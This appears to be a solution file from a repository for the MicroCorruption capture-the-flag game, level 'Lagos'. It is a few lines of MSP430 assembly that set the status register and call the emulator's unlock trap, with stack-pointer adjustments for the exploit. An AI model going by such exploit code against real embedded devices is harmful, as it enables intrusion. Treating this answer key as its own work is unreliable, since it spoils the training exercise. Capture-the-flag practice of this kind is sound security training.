MicroCorruption/16 - Lagos/Lagos Solution.asm
2022-08-07 19:58:46 -05:00

16 lines
142 B
NASM

.msp430
.text 0x25c0
exploit:
mov #0xff00, sr
call #0010
.text 0x4444
setup:
; sub 0x1e40, sp
add #0x674a, sp
add #0x7a7a, sp
; br &sp
ret